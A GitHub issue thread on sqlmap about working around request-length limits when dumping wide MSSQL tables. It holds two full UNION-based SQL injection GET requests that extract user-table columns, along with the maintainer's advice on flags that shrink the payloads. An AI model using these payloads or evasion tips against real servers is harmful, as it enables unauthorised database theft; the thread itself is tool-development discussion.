### ISSUE TITLE
Splitting column technique when you have characters limitation in request | MSSQL 

### ISSUE THREAD

**Issue by shadowzoom** [sqlmapproject/sqlmap#4526]
Hi there, Several times i've got a situation, when target server has characters limitation to send.
When you have many columns (70 columns)  in table, sadly you can't dump all data by 1 row per request due character limitation from server. Sometimes server can give you dump only 4-5 columns from row at once. Would be great if union technique will copy technique from --dns-domain (where data from columns dumping and retrievieng by 1 columns per request)

Some examples:
**Server responsing 404 error because you have been exceeded character limitation from parameter:**
`GET /page.aspx?id=1 UNION ALL SELECT NULL,NULL,(SELECT TOP 1 CHAR(113)+CHAR(98)+CHAR(111)+CHAR(112)+CHAR(113)+ISNULL(CAST(Column1 AS VARCHAR(4000)),CHAR(22))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column2 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column3 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column4 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column5 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column6 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column7 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column8 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column9 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column10 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column11 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column12 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column13 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column14 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column15 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column16 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column17 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column18 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column19 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column20 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column21 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column22 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column23 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column24 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column25 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column26 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column27 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column28 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column29 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column30 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column31 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column32 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column33 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column34 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column35 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column36 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column37 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column38 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column39 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column40 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column41 AS VARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113) FROM mydatabase.dbo.Users WHERE ISNULL(CAST(Column1 AS VARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 15 ISNULL(CAST(Column1 AS VARCHAR(4000)),CHAR(32)) FROM mydatabase.dbo.Users),NULL-- yMyT HTTP/1.1`

**Server responsing 200, good, you have been dumped Column1 and Column2, but other 38 columns can't dumped due character limitation in parameter**
`GET /page.aspx?id=1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+ISNULL(CAST(Column1 AS VARCHAR(4000)),CHAR(32))+CHAR(105)+CHAR(66)+CHAR(120)+CHAR(99)+CHAR(99)+CHAR(99)+ISNULL(CAST(Column2 AS VARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(113),NULL FROM mydatabase.dbo.Users-- zmDV HTTP/1.1 `

**Comment by stamparm** [comment]
1) One column per request potentially gives bad results in some situations, because DBMS doesn't give results of each `SELECT` query in sequential manner (i.e. it is not-deterministic)
2) Thus, all columns in one go are better choice because of 1)
3) You can always restrict column retrievals with `-C`
4) Usually, when you get into this kind of situations you are strongly advised to try to rerun with switch `--no-escape` and/or `--no-cast` (try combinations). In such case, payloads should become noticeably smaller
5) Length constraining mechanism is something that you need to manage yourself (e.g. with stuff mentioned in 4). Expecting sqlmap to do everything for yourself is kind of njaaaa
